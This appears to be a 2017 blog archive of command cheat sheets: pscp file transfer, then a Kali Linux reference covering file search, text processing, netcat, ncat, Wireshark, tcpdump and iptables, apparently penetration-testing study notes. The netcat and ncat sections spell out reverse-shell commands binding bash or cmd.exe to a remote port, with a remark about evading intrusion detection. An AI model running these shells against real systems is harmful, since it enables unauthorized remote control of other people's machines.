Month: October 2017

pscp

/ ineedchris / Leave a comment

Pull file from server

pscp root@127.0.0.1:/etc/myfolder/myfile.opt “C:\download files”

Send file to server

pscp filename.rpm root@127.0.0.1:/etc/myfolder/myfile.opt

 

Kali Linux

/ ineedchris / Leave a comment
  • Set the Target IP Address to the $ip system variable
    export ip=192.168.1.100
  • Find the location of a file
    locate sbd.exe
  • Search through directories in the $PATH environment variable
    which sbd
  • Find a search for a file that contains a specific string in it’s name:
    find / -name sbd\*
  • Show active internet connections
    netstat -lntp
  • Change Password
    passwd
  • Verify a service is running and listening
    netstat -antp |grep apache
  • Start a service
    systemctl start ssh

    systemctl start apache2

  • Have a service start at boot
    systemctl enable ssh
  • Stop a service
    systemctl stop ssh
  • Unzip a gz file
    gunzip access.log.gz
  • Unzip a tar.gz file
    tar -xzvf file.tar.gz
  • Search command history
    history | grep phrase_to_search_for
  • Download a webpage
    wget http://www.cisco.com
  • Open a webpage
    curl http://www.cisco.com
  • String manipulation
    • Count number of lines in file
      wc index.html
    • Get the start or end of a file
      head index.html

      tail index.html

    • Extract all the lines that contain a string
      grep "href=" index.html
    • Cut a string by a delimiter, filter results then sort
      grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u
    • Using Grep and regular expressions and output to a file
      cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt
    • Use a bash loop to find the IP address behind each host
      for url in $(cat list.txt); do host $url; done
    • Collect all the IP Addresses from a log file and sort by frequency
      cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
  • Decoding using Kali
    • Decode Base64 Encoded Values

      echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode

    • Decode Hexidecimal Encoded Values
      echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps
  • Netcat – Read and write TCP and UDP Packets
    • Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems): https://joncraton.org/blog/46/netcat-for-windows/
    • Connect to a POP3 mail server
      nc -nv $ip 110
    • Listen on TCP/UDP port
      nc -nlvp 4444
    • Connect to a netcat port
      nc -nv $ip 4444
    • Send a file using netcat
      nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
    • Receive a file using netcat
      nc -nlvp 4444 > incoming.exe
    • Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that… 
      whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz

/bin/nc.traditional -e /bin/bash 1.2.3.4 4444
    • Create a reverse shell with Ncat using cmd.exe on Windows
      nc.exe -nlvp 4444 -e cmd.exe

      or

      nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe

    • Create a reverse shell with Ncat using bash on Linux
      nc -nv $ip 4444 -e /bin/bash
    • Netcat for Banner Grabbing:

      echo "" | nc -nv -w1 <IP Address> <Ports>

  • Ncat – Netcat for Nmap project which provides more security avoid IDS
    • Reverse shell from windows using cmd.exe using ssl
      ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
    • Listen on port 4444 using ssl
      ncat -v $ip 4444 --ssl
  • Wireshark
    • Show only SMTP (port 25) and ICMP traffic:

      tcp.port eq 25 or icmp

    • Show only traffic in the LAN (192.168.x.x), between workstations and servers — no Internet:

      ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16

    • Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:

      ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip

    • Some commands are equal

      ip.addr == xxx.xxx.xxx.xxx

      Equals

      ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx

      ip.addr != xxx.xxx.xxx.xxx

      Equals

      ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx

  • Tcpdump
    • Display a pcap file
      tcpdump -r passwordz.pcap
    • Display ips and filter and sort
      tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head
    • Grab a packet capture on port 80
      tcpdump tcp port 80 -w output.pcap -i eth0
    • Check for ACK or PSH flag set in a TCP packet
      tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap
  • IPTables
    • Deny traffic to ports except for Local Loopback

      iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP

      iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP

    • Clear ALL IPTables firewall rules 
      iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
iptables -t raw -F iptables -t raw -X